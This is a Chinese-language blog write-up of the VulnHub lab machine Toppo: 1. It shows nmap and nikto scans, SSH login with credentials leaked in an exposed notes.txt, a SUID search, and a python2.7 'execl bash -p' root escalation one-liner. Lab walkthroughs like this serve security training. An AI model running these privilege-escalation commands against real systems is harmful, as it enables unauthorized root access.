您当前的位置: 首页 > 

仙女象

暂无认证

  • 3浏览

    0关注

    136博文

    0收益

  • 0浏览

    0点赞

    0打赏

    0留言

私信
关注
热门博文

vulnhub Toppo: 1

仙女象 发布时间:2022-05-22 19:27:55 ,浏览量:3

渗透思路:

nmap扫描---->nikto扫描发现可疑目录---->网站文件泄露ssh用户名和密码---->python命令suid提权

环境信息:

靶机:192.168.101.67

攻击机:192.168.101.34

具体步骤: 1、nmap扫描
sudo nmap -sV -sC -p- 192.168.101.67

扫描到22(ssh)、80(http)、111和 49047端口

2、nikto扫描,找到ssh用户名密码

先看一下80端口,用nikto扫描出了几个目录

​nikto -host http://192.168.101.67

其中/admin/目录下有一个notes.txt文件

http://192.168.101.67/admin/

http://192.168.101.67/admin/notes.txt 文件内容如下图所示

从中可以发现用户密码是12345ted123,而用户名没有明确说,从密码可以猜测用户名可能是ted。

以用户名ted,密码12345ted123进行ssh登录,登录成功。

ssh ted@192.168.101.67

3、python命令suid提权

靶机上shell上输入如下命令查找有suid的命令

find / -user root -perm /4000 2>/dev/null

其中python2.7命令很可疑,或许可以用来提权。

在GTFOBins网站上找到python命令的suid提权方法如下图所示

python | GTFOBins

但是GTFOBins上的提权方法直接执行会失败,改成下面这样执行(也就是sh改成bash),成功提权到root

python2.7 -c 'import os; os.execl("/bin/bash", "bash", "-p")'

​​​​​​​

在/root/目录下找到flag.txt

关注
打赏
1661867686
查看更多评论
立即登录/注册

微信扫码登录

0.0378s